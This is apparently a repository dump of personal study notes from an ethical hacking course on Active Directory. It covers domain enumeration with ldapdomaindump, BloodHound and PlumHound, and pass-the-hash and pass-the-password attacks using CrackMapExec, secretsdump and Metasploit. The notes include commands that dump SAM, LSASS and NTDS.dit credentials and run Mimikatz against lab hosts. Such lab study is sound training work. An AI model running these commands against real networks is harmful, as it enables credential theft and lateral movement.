2 | > 03.08.2024 3 | --- 4 | 5 | ## 1. Start the day with mitm6 or Responder 6 | 7 | ## 2. Run scans to generate traffic 8 | 9 | ## 3. If scans are taking too long, look for websites in scope (http_version) 10 | 11 | ## 4. Look for default credentials on web logins 12 | 13 | ## 5. Think outside the box -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with ldapdomaindump 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with ldapdomaindump 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with plumhound 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/00. image/domain enumeration with plumhound 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/01. Domain Enumeration with ldapdomaindump.md: -------------------------------------------------------------------------------- 1 | # Domain Enumeration with ldapdomaindump 2 | > 05.08.2024 3 | --- 4 | ### Ip Addresses 5 | MARVEL-DC: `192.168.19.128` 6 | THEPUNISHER: `192.168.19.129` 7 | SPIDERMAN: `192.168.19.130` 8 | HackerMan: `192.168.19.131` 9 | 10 | **LdapDomainDump:** 11 | ```bash 12 | mkdir marvel.local && cd marvel.local 13 | 14 | sudo ldapdomaindump ldaps://192.168.19.128 -u 'MARVEL\fcastle' -p Password1 15 | 16 | [*] Connecting to host... 17 | [*] Binding to host 18 | [+] Bind OK 19 | [*] Starting domain dump 20 | [+] Domain dump finished 21 | 22 | ls 23 | 24 | domain_computers.grep domain_policy.json 25 | domain_computers.html domain_trusts.grep 26 | domain_computers.json domain_trusts.html 27 | domain_computers_by_os.html domain_trusts.json 28 | domain_groups.grep domain_users.grep 29 | domain_groups.html domain_users.html 30 | domain_groups.json domain_users.json 31 | domain_policy.grep domain_users_by_group.html 32 | domain_policy.html 33 | ``` 34 | 35 | **View the dump:** 36 | ```bash 37 | firefox domain_users_by_group.html 38 | ``` 39 | 40 | ![[domain enumeration with ldapdomaindump 01.png]] 41 | 42 | - Get high value credentials 43 | - Get domain users 44 | - Utilize available info 45 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/02. Domain Enumeration with Bloodhound.md: -------------------------------------------------------------------------------- 1 | # Domain Enumeration with Bloodhound 2 | > 05.08.2024 3 | --- 4 | ### Ip Addresses 5 | MARVEL-DC: `192.168.19.128` 6 | THEPUNISHER: `192.168.19.129` 7 | SPIDERMAN: `192.168.19.130` 8 | HackerMan: `192.168.19.131` 9 | 10 | 11 | **Start neo4j:** 12 | ```bash 13 | sudo neo4j console 14 | 15 | Directories in use: 16 | home: /usr/share/neo4j 17 | config: /usr/share/neo4j/conf 18 | logs: /etc/neo4j/logs 19 | plugins: /usr/share/neo4j/plugins 20 | import: /usr/share/neo4j/import 21 | data: /etc/neo4j/data 22 | certificates: /usr/share/neo4j/certificates 23 | licenses: /usr/share/neo4j/licenses 24 | run: /var/lib/neo4j/run 25 | Starting Neo4j. 26 | 2024-08-05 10:07:05.128+0000 INFO Starting... 27 | 2024-08-05 10:07:05.332+0000 INFO This instance is ServerId{25167f39} (25167f39-46b5-409f-91a1-64b55b3b7d33) 28 | 2024-08-05 10:07:05.839+0000 INFO ======== Neo4j 4.4.26 ======== 29 | 2024-08-05 10:07:06.634+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED 30 | 2024-08-05 10:07:06.638+0000 INFO Setting up initial user from defaults: neo4j 31 | 2024-08-05 10:07:06.638+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false) 32 | 2024-08-05 10:07:06.642+0000 INFO Setting version for 'security-users' to 3 33 | 2024-08-05 10:07:06.643+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT 34 | 2024-08-05 10:07:06.645+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT 35 | 2024-08-05 10:07:06.795+0000 INFO Bolt enabled on localhost:7687. 36 | 2024-08-05 10:07:07.189+0000 INFO Remote interface available at http://localhost:7474/ 37 | 2024-08-05 10:07:07.191+0000 INFO id: 822FDC62194D2DE143CF2F436E9D0D9538BE1C20BADF9AD6165C2FC72281E920 38 | 2024-08-05 10:07:07.191+0000 INFO name: system 39 | 2024-08-05 10:07:07.191+0000 INFO creationDate: 2024-08-05T10:07:06.127Z 40 | 2024-08-05 10:07:07.191+0000 INFO Started. 41 | 42 | ``` 43 | 44 | - Required for bloodhound 45 | - http://localhost:7474/ 46 | - new user 'neo4j' 47 | - Set Password if first time login 48 | - Default password: neo4j / neo4j 49 | 50 | **Start Bloodhound:** 51 | ```bash 52 | sudo bloodhound 53 | ``` 54 | - Enter password for neo4j in bloodhound 55 | - Collect data into bloodhound / injestors 56 | 57 | **Run injestor:** 58 | ```bash 59 | mkdir bloodhound && cd bloodhound 60 | 61 | sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 192.168.19.128 -c all 62 | INFO: Found AD domain: marvel.local 63 | INFO: Getting TGT for user 64 | WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hydra-dc.marvel.local:88)] [Errno -2] Name or service not known 65 | INFO: Connecting to LDAP server: hydra-dc.marvel.local 66 | INFO: Found 1 domains 67 | INFO: Found 1 domains in the forest 68 | INFO: Found 3 computers 69 | INFO: Connecting to LDAP server: hydra-dc.marvel.local 70 | INFO: Found 8 users 71 | INFO: Found 52 groups 72 | INFO: Found 3 gpos 73 | INFO: Found 2 ous 74 | INFO: Found 19 containers 75 | INFO: Found 0 trusts 76 | INFO: Starting computer enumeration with 10 workers 77 | INFO: Querying computer: SPIDERMAN.MARVEL.LOCAL 78 | INFO: Querying computer: THEPUNIISHER.MARVEL.LOCAL 79 | INFO: Querying computer: HYDRA-DC.MARVEL.LOCAL 80 | INFO: Done in 00M 00S 81 | 82 | ls 83 | 20240805051303_computers.json 20240805051303_gpos.json 20240805051303_users.json 84 | 20240805051303_containers.json 20240805051303_groups.json 85 | 20240805051303_domains.json 20240805051303_ous.json 86 | ``` 87 | 88 | **Import data into bloodhound:** 89 | 1. Select upload data 90 | 2. Select the location used to store the data 91 | 3. Select all and open 92 | 93 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/15. Attacking Active Directory (Post-Compromise Enumeration)/03. Domain Enumeration with Plumhound.md: -------------------------------------------------------------------------------- 1 | # Domain Enumeration with Plumhound 2 | > 05.08.2024 3 | --- 4 | 5 | Ip Addresses 6 | MARVEL-DC: `192.168.19.128` 7 | THEPUNISHER: `192.168.19.129` 8 | SPIDERMAN: `192.168.19.130` 9 | HackerMan: `192.168.19.131 10 | 11 | **Installing Plumhound:** 12 | ```bash 13 | git clone https://github.com/PlumHound/PlumHound.git 14 | cd PlumHound 15 | pip3 install -r requirements.txt 16 | ``` 17 | 18 | **Utilize Plumhound:** 19 | ```bash 20 | sudo python3 PlumHound.py --easy -p password 21 | ... 22 | Completed 1 of 1 tasks. 23 | ``` 24 | - Bloodhound and neo4j must be open! 25 | 26 | **Execute task:** 27 | ```bash 28 | sudo python3 PlumHound.py -x tasks/default.tasks -p password 29 | ... 30 | Completed 114 of 114 tasks. 31 | 32 | cd reports 33 | 34 | firefox index.html 35 | ``` 36 | 37 | ![[domain enumeration with plumhound 01.png]] -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/00. image/kerberosting overview 01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrMidnight7331/PJPT-Notes/06491b77f23cfb4dfce939eef5fc8e36f57645fd/Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/00. image/kerberosting overview 01.png -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/01. Pass Attacks Overview.md: -------------------------------------------------------------------------------- 1 | # Pass Attacks Overview 2 | > 29.07.2024 3 | --- 4 | 5 | ## Explanation 6 | 7 | **Pass attacks** are a type of cybersecurity threat where attackers use captured credentials, such as passwords or hashes, to move laterally within a network and gain unauthorized access to systems. The primary goal is to find a valid login on one of the machines within the network, allowing the attacker to escalate privileges and potentially compromise the entire system. 8 | 9 | **Pass the Hash** is a hacking technique where an attacker captures a hashed version of a password and uses it to authenticate themselves without needing to know the actual password. 10 | 11 | **Pass the Password** is a simpler concept compared to Pass the Hash. In this attack, the actual plaintext password is captured and used directly by the attacker. 12 | 13 | ## Workflow 14 | 15 | #### 1. Initial Access 16 | - **Objective:** Gain a foothold in the network. 17 | - **Methods:** 18 | - **Phishing:** Sending emails with malicious attachments or links to employees to trick them into revealing credentials or installing malware. 19 | - **Exploiting Vulnerabilities:** Taking advantage of known vulnerabilities in software or systems to gain access. 20 | - **Social Engineering:** Manipulating individuals to disclose sensitive information or credentials. 21 | 22 | #### 2. Credential Harvesting 23 | - **Objective:** Capture user credentials, either in plaintext or hashed form. 24 | - **Methods:** 25 | - **Keylogging:** Using malware to record keystrokes and capture usernames and passwords. 26 | - **Memory Dumping:** Extracting password hashes directly from the computer's memory. 27 | - **Network Sniffing:** Monitoring unencrypted network traffic to capture credentials being transmitted. 28 | 29 | #### 3. Credential Analysis 30 | - **Objective:** Identify useful credentials for lateral movement. 31 | - **Methods:** 32 | - **Analyzing Hashes:** Reviewing captured password hashes to determine their potential usability. 33 | - **Cracking Passwords:** Attempting to decrypt hashed passwords using tools like John the Ripper or Hashcat, especially for weak or common passwords. 34 | 35 | #### 4. Lateral Movement 36 | - **Objective:** Move through the network using stolen credentials. 37 | - **Methods:** 38 | - **Pass the Hash (PtH):** Using hashed credentials to authenticate with other machines on the network without needing the plaintext password. 39 | - **Pass the Password:** Using plaintext passwords to log into other machines directly. 40 | - **Remote Access Tools:** Utilizing tools like RDP (Remote Desktop Protocol) or PsExec to execute commands on remote machines. 41 | 42 | 43 | ## How to ["Crackmapexec" ](https://github.com/byt3bl33d3r/CrackMapExec) 44 | 45 | **Pass the Password:** 46 | ```bash 47 | crackmapexec smb -u -d -p 48 | 49 | crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password123 50 | ``` 51 | 52 | **Pass the Hash:** 53 | ```bash 54 | crackmapexec smb -u -H --local-auth 55 | 56 | crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth 57 | ``` 58 | 59 | **Dump SAM hashes:** 60 | ```bash 61 | crackmapexec smb -u > -H --local-auth --sam 62 | 63 | crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --sam 64 | ``` 65 | 66 | **Dump shares:** 67 | ```bash 68 | crackmapexec smb -u -H --local-auth --shares 69 | 70 | crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --shares 71 | ``` 72 | 73 | **Dump lsass with lsassy:** 74 | ```bash 75 | crackmapexec smb -u -H --local-auth -M lsassy 76 | 77 | crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth -M lsassy 78 | ``` 79 | 80 | **Show built in modules:** 81 | ```bash 82 | crackmapexec smb -L 83 | ``` 84 | 85 | **The CME DB:** 86 | ```bash 87 | cmedb 88 | ``` 89 | 90 | **Cheatsheet from CME:** 91 | https://ptestmethod.readthedocs.io/en/latest/cme.html 92 | 93 | ## Grab local hashes 94 | 95 | **Get hashes via [secretsdump](https://github.com/fin3ss3g0d/secretsdump.py):** 96 | ```bash 97 | secretsdump.py /:@ 98 | 99 | secretsdump.py MARVEL.local/fcastle:Password123@10.0.2.25 100 | ``` 101 | 102 | **Get hashes via metasploit:** 103 | 104 | ```bash 105 | msfconsole -q 106 | use windows/smb/psexec 107 | ``` 108 | 109 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/16. Attacking Active Directory (Post-Compromise Attacks)/01.5. Crackmapexec large Cheatsheet.md: -------------------------------------------------------------------------------- 1 | 2 | # Crackmapexec large cheatsheet 3 | > 29.07.2024 4 | 5 | --- 6 | 7 | # CrackMapExec (CME) Cheatsheet 8 | 9 | ### Common Syntax 10 | 11 | - **Basic Structure:** 12 | ```bash 13 | cme -u -p [options] 14 | ``` 15 | 16 | - **Using Hashes:** 17 | ```bash 18 | cme -u -H [options] 19 | ``` 20 | 21 | - **Using NTLM Hashes:** 22 | ```bash 23 | cme -u -H 24 | ``` 25 | 26 | ### SMB (Server Message Block) 27 | 28 | - **List SMB Shares:** 29 | ```bash 30 | cme smb --shares 31 | ``` 32 | 33 | - **Enumerate Users:** 34 | ```bash 35 | cme smb --users 36 | ``` 37 | 38 | - **Enumerate Groups:** 39 | ```bash 40 | cme smb --groups 41 | ``` 42 | 43 | - **Enumerate Sessions:** 44 | ```bash 45 | cme smb --sessions 46 | ``` 47 | 48 | - **Enumerate Domain:** 49 | ```bash 50 | cme smb --enum 51 | ``` 52 | 53 | - **Execute Remote Command:** 54 | ```bash 55 | cme smb -u -p -x 56 | ``` 57 | 58 | - **SMB Login Check:** 59 | ```bash 60 | cme smb -u -p 61 | ``` 62 | 63 | - **Pass the Hash (PTH):** 64 | ```bash 65 | cme smb -u -H 66 | ``` 67 | 68 | - **Pass the Password (PTP):** 69 | ```bash 70 | cme smb -u -p --local-auth 71 | ``` 72 | 73 | - **SAM Dump:** 74 | ```bash 75 | cme smb -u -p --sam 76 | ``` 77 | 78 | - **LSASS Dump:** 79 | ```bash 80 | cme smb -u -p --lsa 81 | ``` 82 | 83 | - **Dump NTDS.dit (Domain Controller):** 84 | ```bash 85 | cme smb -u -p --ntds 86 | ``` 87 | 88 | - **WMI Command Execution:** 89 | ```bash 90 | cme smb -u -p -x --exec-method wmi 91 | ``` 92 | 93 | - **Mimikatz:** 94 | ```bash 95 | cme smb -u -p -M mimikatz 96 | ``` 97 | 98 | - **PowerShell Scripts:** 99 | ```bash 100 | cme smb -u -p -M powershell -o "COMMAND=